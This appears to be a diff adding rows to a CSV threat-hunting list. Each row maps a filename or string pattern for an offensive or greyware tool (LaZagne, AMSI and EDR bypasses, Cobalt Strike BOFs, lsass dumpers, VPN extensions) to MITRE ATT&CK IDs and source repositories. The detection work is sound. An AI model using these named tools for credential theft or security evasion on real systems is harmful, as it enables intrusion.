+"*airodump-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*airpwn-ng*","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1562 - T1564 - T1565 - T1566 - T1567 - T1573","TA0005 - TA0007 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","1","23","11","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z"
+"*aix2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*aix2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*ajpc500/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
+"*akeehkgglkmpapdnanoochpfmeghfdln*","greyware_tool_keyword","VPN Master","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*akkbkhnikoeojlhiiomohpdnkhbkhieh*","greyware_tool_keyword","Prime VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*AlanFramework.git*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*Alcatraz.sln*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
+"*Alcatraz.vcxproj*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
+"*Alcatraz/obfuscator*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
+"*Alcatraz-master.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
+"*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
+"*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege 
Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
+"*AlessandroZ/LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*alexa-top-20000-sites.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*al-khaser*","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. 
It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","10","5073","1120","2023-09-29T17:54:38Z","2015-11-12T18:35:16Z"
+"*All EDR drivers were successfully removed from Kernel callbacks!*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*All_SubdomainTOP_Seclist.txt*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z"
+"*AllowDelegationUsers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*AllowDelegationUsers_samaccountnames_only.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*almalgbpmcfpdaopimbdchdliminoign*","greyware_tool_keyword","Urban Shield","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*almandin/krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"*ALPC-TaskSched-LPE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ALPC-TaskSched-LPE.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*AlphabugX/csOnvps*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*AlphabugX/csOnvps*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*Already SYSTEM*not elevating*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*AlteredSecurity/365-Stealer*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*alwaysinstallelevated.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*alwaysinstallelevated.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*alwaysinstallelevated.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*am0nsec/HellsGate*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*amass enum -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*amass-get-rootdomains*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*amass-get-subdomains*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*amnoibeflfphhplmckdbiajkjaoomgnj*","greyware_tool_keyword","HideAll VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AMS1-Patch.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*AMSI patched in all powershells*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*AMSI_Bypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*AMSI_bypass_20*.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*AMSI_patch-main*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*Amsi-Bypass*","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1326","245","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" +"*amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*AmsiBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*Amsi-Killer.exe*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*Amsi-Killer.sln*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*Amsi-Killer.vcxproj*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*Amsi-Killer-master*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*AmsiOpenSession.cpp*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" 
+"*AmsiOpenSession.sln*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*AmsiOpenSession.vcxproj*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*and Credential Guard will not be bypassed*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*andotp2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AndrewSpecial.cpp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*AndrewSpecial.exe*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" 
